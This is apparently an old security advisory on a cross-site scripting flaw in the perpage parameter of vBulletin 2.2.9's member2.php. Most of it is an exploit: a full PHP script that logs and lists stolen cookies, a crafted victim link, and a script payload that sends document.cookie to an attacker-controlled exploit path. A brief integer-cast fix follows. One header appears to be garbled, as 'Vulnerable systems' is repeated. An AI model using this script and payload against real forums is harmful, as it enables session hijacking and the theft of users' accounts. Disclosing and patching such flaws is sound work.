|
|
|
|
| |
| vBulletin is a powerful and widely used bulletin board system, based on PHP language and MySQL database. Sp IC discovered lately a Cross-Site Scripting issue that would allow attackers to inject maleficent codes into the pages and execute it on the client's browser. |
| |
Credit:
The information has been provided by Sp.IC and Scott MacVicar.
|
| |
Vulnerable systems:
* Jelsoft vBulletin 2.2.9 Release Candidate and prior
Vulnerable systems:
* Jelsoft vBulletin 2.2.9 Final
At "Start View Threads" block in member2.php, there is a variable [$perpage] controls the way of reciting subscribed threads, therefore an integer value [Which refers to the number of threads that will be displayed each page] should be assigned for the variable. However, we should realize that the value of this variable is added to a query that will fetch records from the database, so if a client gave a wrong value to $perpage, the script will output an error message [Due to script doesn't checks on inputs and filter it], printing the query and revealing its mistake.
Exploit:
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's cookies and storing it into a log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("o Download Log : " . $Link['Download'] . "\n");
Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
Solution:
- Under [ // set defaults ] on line 304, paste this code:
If (IsSet ($perpage) && $perpage != Is_Int($perpage)) {
$perpage = IntVal ($perpage);
}
|
|
|
|
|
